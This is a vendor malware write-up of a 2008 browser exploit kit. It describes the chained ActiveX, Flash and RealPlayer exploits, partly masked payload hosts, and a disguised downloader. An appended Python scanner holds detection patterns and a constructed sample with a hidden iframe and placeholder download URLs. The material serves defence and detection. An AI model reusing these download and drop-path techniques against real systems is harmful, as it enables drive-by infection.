Exploit.SinaDLoader.B
(Exploit:JS/Axdow.A, JS.ActiveXploit.Gen, Trojan-Downloader.JS.Agent.di)

Spreading: medium
Damage: medium
Size: approx. 3 KB
Discovered: 2008 Sep 03
SYMPTOMS:
This is an exploit (in fact a set of several) with few noticeable symptoms of infection. It has been hosted on various malware websites.
TECHNICAL DESCRIPTION:
The exploit follows the trend seen on recent malware-hosting sites: rather than relying on a single flaw, it tries a series of exploits against the visiting browser, and if one fails it simply moves on to the next.
The exploits used are:
- Snapshot Viewer Control.1. The mechanism is described here (it is used by another script that exploits a vulnerability in the ActiveX control for the Snapshot Viewer). With this exploit it tries to download a file onto the affected computer to the path ([c, d or e drive]:\Program Files/Outlook Express/wab.exe) from the address xxx.xiazail?.com/mas1.css. Although it has the extension "css" (Cascading Style Sheets, used for formatting HTML), it is an executable file.
- DownloadAndInstall exploit, used to download http://zxc.11se??.com/mas1.exe, which is the same file mentioned above, only this time with the extension "exe".
- Adodb.Stream exploit, which creates an invisible iframe to http://222.213asd??.com/ms06014.js, which in turn downloads and executes the same file from the address discussed under the first point. The file is saved on the computer as "..\\ntuser.com" (the parent folder of your browser's directory).
- ShockwaveFlash.ShockwaveFlash.9 exploit, which serves a particular SWF file according to the Flash version installed on the user's machine, in the form of an embedded object. The code looks like this: "<embed src="http://222.213asd??.com/'+[variable_that_stores_part_of_version]+'.swf"></embed>".
- UUUpgrade ActiveX Control module update exploit (UUUPGRADE.UUUpgradeCtrl.1 component), which downloads http://222.213asd??.com/UU.ini.
- Lianzhong chat room (GLIEDown.IEDown.1) exploit, which downloads "http://222.213asdas.com/GLWORLD.html"; that page in turn downloads, through another exploit (a buffer overflow), the file http://xxx.xiazail??.com/mas1.css (the same "old" malware file).
- A RealPlayer exploit (IERPCtl.IERPCtl.1 component) which, for versions lower than 6.0.14.552, pushes the script 222.213asd??.com/real.js, which takes a different approach for distinct versions. If the user has a newer version, it creates an invisible iframe with "http://222.213asd??.com/Real11.html", which downloads http://xxx.xiazail??.com/mas1.css.
- Baidu Search Bar (BaiduBar.Tool) exploit, using the vulnerable "DloadDS" function, which refers to "http://222.213asd??.com/Baidu.cab" and a "Baidu.exe" inside that CAB archive.
- Xunlei Thunder exploit (ActiveXObject DPClient.Vod), with another invisible iframe that leads to 222.213asd??.com/Thunder.html, unavailable at the time of analysis.
The files I mentioned numerous times, mas1.css and mas1.exe, are actually the same file. It is a small downloader (1900 bytes) packed with FSG, which downloads 5640ghi?.com/max1.exe (unfortunately unavailable at the time of analysis) and is detected as Generic.Malware.dld!!.8EC79AB8.
As you can see, there is a long chain of scripts and executables that try to download the "final" malware. It is a hierarchy of exploits that takes advantage of flaws in several different applications. Thus you should always keep the applications you use updated and your antivirus product up to date.
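A static triage check for pages of this kind, added here as an example and not part of the original analysis: it looks for the ActiveX ProgIDs listed above, the invisible iframes and the drop paths the chain uses, and combines them into a score. The sample script and its hosts are constructed placeholders, not the real exploit code.

```python
import re

# ProgIDs the write-up lists as abused by this chain. Instantiating one is
# not proof of malice (legitimate pages use them too), so hits are scored
# together with downloader behaviour rather than treated as a verdict.
ABUSED_PROGIDS = {
    "snapshot viewer control.1": "Snapshot Viewer",
    "adodb.stream": "ADODB.Stream",
    "shockwaveflash.shockwaveflash.9": "Flash 9",
    "uuupgrade.uuupgradectrl.1": "UUUpgrade",
    "gliedown.iedown.1": "Lianzhong GLIEDown",
    "ierpctl.ierpctl.1": "RealPlayer IERPCtl",
    "baidubar.tool": "Baidu Search Bar",
    "dpclient.vod": "Xunlei Thunder",
}

ACTIVEX_RE = re.compile(r"""ActiveXObject\s*\(\s*['"]([^'"]+)['"]""", re.I)
URL_RE = re.compile(r"""https?://([^/\s'"<>]+)[^\s'"<>]*""", re.I)
# an iframe with zero width or height: the "invisible iframe" of the write-up
HIDDEN_IFRAME_RE = re.compile(r"""<iframe\b[^>]*\b(?:width|height)\s*=\s*['"]?0\b""", re.I)
# drop locations named in the write-up (wab.exe under Outlook Express, ntuser.com)
DROP_PATH_RE = re.compile(r"Outlook Express[\\/]+wab\.exe|ntuser\.com", re.I)


def triage(script: str) -> dict:
    """Return the abused ProgIDs, contacted hosts and downloader traits in a script."""
    progids = sorted({m.group(1).lower() for m in ACTIVEX_RE.finditer(script)})
    abused = [p for p in progids if p in ABUSED_PROGIDS]
    hosts = sorted({m.group(1).lower() for m in URL_RE.finditer(script)})
    hidden = bool(HIDDEN_IFRAME_RE.search(script))
    drop = bool(DROP_PATH_RE.search(script))
    score = 2 * len(abused) + (1 if hidden else 0) + (3 if drop else 0)
    if len(hosts) >= 2:  # payloads spread over several hosts, as in this chain
        score += 1
    return {"abused_progids": [ABUSED_PROGIDS[p] for p in abused], "hosts": hosts,
            "hidden_iframe": hidden, "drop_path": drop, "score": score,
            "verdict": "likely exploit kit" if score >= 5 else "review manually"}


# Constructed sample modelled on the description; hosts are placeholders and
# no exploit logic is present, only the markers a scanner would key on.
SAMPLE = r"""
var s = new ActiveXObject('Adodb.Stream');
var rp = new ActiveXObject("IERPCtl.IERPCtl.1");
var dst = 'C:\\Program Files\\Outlook Express\\wab.exe';
document.write('<iframe src="http://payload-host.example/ms06014.js" width=0 height=0></iframe>');
var u = 'http://dropper-host.example/mas1.css';
"""

if __name__ == "__main__":
    print(triage(SAMPLE))
```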
Removal instructions:
Please let BitDefender disinfect your files.
ANALYZED BY:
Daniel Chipiristeanu, virus researcher